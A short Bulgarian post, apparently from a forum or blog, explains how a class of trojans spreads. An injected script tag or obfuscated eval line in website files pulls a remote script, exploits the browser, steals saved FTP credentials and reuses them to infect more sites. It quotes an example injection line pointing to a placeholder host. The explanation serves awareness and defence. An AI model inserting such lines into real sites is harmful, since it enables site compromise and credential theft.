Преди около година се появи нов клас троянски коне, които работят по следния начин:
1. В HTML, JS, PHP и т.н. файлове на някой уебсайт се появява още един ред, който понякога (като в този случай) е просто "<script src="
http://blaaaa/something.js"></script>", а друг път е същото, ама силно obfuscate-нато - eval(base64_decode("GBFDJXDFHFGHDHFFHGBHDFH")) или нещо такова.
2. Браузърът на жертвата поглежда някой от променените HTML, JS, PHP и т.н. файлове, изпълнява този ред и тегли въпросния something.js.
3. Този something.js използва проблем в сигурността на браузъра, за да "пробие" до ниво достъп до локални файлове и да инсталира троянския кон върху компютъра на жертвата
4. Троянският кон периодично претърсва компютъра за инсталирани неща като CuteFTP, FileZilla, WinSCP и други такива FTP/SFTP клиенти и събира запазените usernames и пароли, като ги предава на някакъв централен сървър.
5. В един момент - понякога седмици или дори месеци след оригиналното заразяване - централният сървър казва на всичките си войничета "айде, ето ви тук username и парола за ей-тоя сървър, действайте!" - и една орда zombie minions от цял свят започват да се закачат за сървъра, теглят де що има HTML, PHP, JS и т.н. файлове - *и добавят <script src="..."> накрая!* 
 
6. В следващия момент някой невинен клиент поглежда сайта, браузърът му вижда <script src="...">... и цикълът започва отново 

Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.